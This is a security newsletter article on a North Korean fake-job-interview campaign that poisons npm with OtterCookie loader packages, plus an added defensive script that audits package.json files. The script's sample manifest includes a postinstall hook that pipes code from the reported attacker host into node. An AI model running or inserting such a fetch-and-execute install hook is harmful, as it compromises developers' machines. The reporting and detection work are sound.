
CYBER SYRUP
Delivering the sweetest insights on cybersecurity.
North Korean “Contagious Interview” Campaign Floods npm With Nearly 200 New Malicious Packages

Security researchers report that North Korea–aligned threat actors behind the Contagious Interview campaign have published 197 additional malicious npm packages, making it one of the largest ongoing package-ecosystem abuse campaigns documented to date. The new packages—downloaded more than 31,000 times—deliver an evolved, cross-platform variant of OtterCookie that blends capabilities of both OtterCookie and BeaverTail. The campaign targets developers, job seekers, and individuals lured into fraudulent hiring pipelines.
Context
The Contagious Interview campaign weaponizes:
Fake job interviews
Malicious coding assessments
npm package poisoning
Developer-focused social engineering
Crypto-centric workflows
North Korean threat groups have repeatedly targeted software engineers, blockchain developers, and individuals connected to cryptocurrency projects. npm is an attractive delivery channel due to its enormous install base and dependency chain complexity.
Cisco Talos and others previously documented infections linked to fake recruitment processes where victims were tricked into running Node.js applications that deployed OtterCookie.
What Happened
Socket researchers identified 197 new npm packages tied to the campaign, including:
bcryptjs-node
cross-sessions
json-oauth
node-tailwind
react-adparser
session-keeper
tailwind-magic
tailwindcss-forms
webpack-loadcss
These packages pose as legitimate developer utilities but contain loader code that retrieves OtterCookie from dedicated delivery infrastructure.
The loader connects to a hard-coded Vercel URL (tetrismic.vercel.app), which in turn serves the payload from an attacker-controlled GitHub repository. The GitHub account stardev0914 has since been removed.
Technical Breakdown
Loader Behavior
Once executed, the malicious npm package:
Evades sandboxes and virtual machines
Profiles the host system
Retrieves cross-platform OtterCookie
Establishes a command-and-control (C2) session
Provides attackers a remote shell
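The loader packages listed under What Happened run at install time and reach out to the hard-coded delivery host before any developer reads their code. The following audit is an added example, not code from the article, Socket, or the campaign: it scans a package.json for the nine reported package names and for install-time lifecycle scripts that fetch from a remote host, flagging the reported Vercel domain separately. The package names and host come from the article; the SAMPLE_MANIFEST is constructed for demonstration.

```javascript
// Added defensive example (not from the article). Package names and the delivery
// host are those reported in the article; the sample manifest below is constructed.
const CAMPAIGN_PACKAGES = new Set([
  'bcryptjs-node', 'cross-sessions', 'json-oauth', 'node-tailwind', 'react-adparser',
  'session-keeper', 'tailwind-magic', 'tailwindcss-forms', 'webpack-loadcss',
]);
const CAMPAIGN_HOSTS = new Set(['tetrismic.vercel.app']);
const DEP_FIELDS = ['dependencies', 'devDependencies', 'optionalDependencies'];
// Scripts npm runs automatically during `npm install`, without user interaction.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Returns a list of findings for one parsed package.json object.
function auditManifest(manifest) {
  const findings = [];
  // 1. Direct dependencies whose names match the reported campaign packages.
  for (const field of DEP_FIELDS) {
    for (const name of Object.keys(manifest[field] || {})) {
      if (CAMPAIGN_PACKAGES.has(name)) findings.push({ kind: 'campaign-package', name, field });
    }
  }
  // 2. Any URL inside an install hook means code is pulled from the network at
  //    install time; the reported delivery host gets its own finding kind.
  const urlRe = /https?:\/\/([a-z0-9.-]+)/gi;
  for (const hook of INSTALL_HOOKS) {
    const cmd = (manifest.scripts || {})[hook];
    if (typeof cmd !== 'string') continue;
    for (const m of cmd.matchAll(urlRe)) {
      const host = m[1].toLowerCase();
      findings.push({
        kind: CAMPAIGN_HOSTS.has(host) ? 'campaign-host' : 'remote-fetch-in-install-hook',
        hook,
        host,
      });
    }
  }
  return findings;
}

// Constructed sample: one campaign package in each dependency field, a postinstall
// hook that reaches the reported delivery host, and a benign build script.
const SAMPLE_MANIFEST = {
  name: 'demo-app',
  dependencies: { express: '^4.19.0', 'tailwind-magic': '^1.0.2' },
  devDependencies: { 'webpack-loadcss': '^0.1.0' },
  scripts: {
    postinstall: 'curl -s https://tetrismic.vercel.app/x | node',
    build: 'node build.js',
  },
};
```

To audit a real project, pass the parsed file: `auditManifest(JSON.parse(fs.readFileSync('package.json', 'utf8')))`; an empty array means nothing on this list was found, not that the project is clean.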
OtterCookie Capabilities
The malware supports:
Clipboard theft
Keylogging
Screenshot capture
Credential harvesting
Cryptocurrency wallet and seed phrase theft
Browser data exfiltration
Document collection
The C2 communication fetches instructions from the attacker’s servers and maintains persistent control.
Evolving Tradecraft
Researchers note significant overlap between OtterCookie and BeaverTail, suggesting the threat actors are merging toolsets across campaigns to optimize their operations.
The campaign parallels another DPRK-linked effort, ClickFake Interview, which distributes GolangGhost (FlexibleFerret/WeaselStore) via fake assessment websites. This malware disguises itself as camera/microphone troubleshooting tools and deploys:
A Go-based RAT
macOS LaunchAgent persistence
A decoy Chrome camera prompt
A fake Chrome password prompt that harvests victims’ credentials and sends them to Dropbox
Impact Analysis
This campaign targets individuals rather than enterprises, focusing on:
Developers completing coding tests
Applicants in simulated interview environments
Users who install npm packages without scrutiny
The stolen data—browser credentials, wallet seeds, documents, keystrokes—directly supports financial theft and long-term espionage.
The npm ecosystem remains vulnerable to:
Package typosquatting
Dependency chain poisoning
Social engineering targeting developers
Given more than 31,000 downloads, exposure is widespread and global.
Why It Matters
This is not a supply-chain operation targeting a single company—it’s a mass recruitment-themed attack pipeline designed to compromise individuals connected to high-value sectors. The campaign shows:
DPRK threat actors have deeply adapted to modern JavaScript workflows
npm remains a heavily abused ecosystem
Developer-focused attacks are increasing
Pairing social engineering with malware delivery is a persistent DPRK pattern
Unlike their IT worker impersonation schemes, Contagious Interview aims directly at individuals through staged hiring processes.
Expert Commentary
Researcher Kirill Boychenko emphasizes the campaign’s scale, noting its “prolific exploitation of npm” and its alignment with JavaScript and crypto-centric developer habits.
Validin analysts clarify that this campaign is distinct from broader DPRK IT worker infiltration:
Instead of placing operatives inside companies, Contagious Interview weaponizes the job application process itself, using malicious assessments and fraudulent platforms to compromise victims.
Key Takeaways
197 new malicious npm packages linked to DPRK actors.
31,000+ downloads delivering updated OtterCookie malware.
Loader packages connect to Vercel-hosted infrastructure to fetch payloads.
Malware supports keylogging, clipboard theft, screenshot capture, credential harvesting, and crypto wallet theft.
Campaign overlaps with ClickFake Interview and GolangGhost malware.
Attackers exploit fake job interviews and developer workflows.
npm remains a major distribution channel for supply-chain and social-engineering driven attacks.

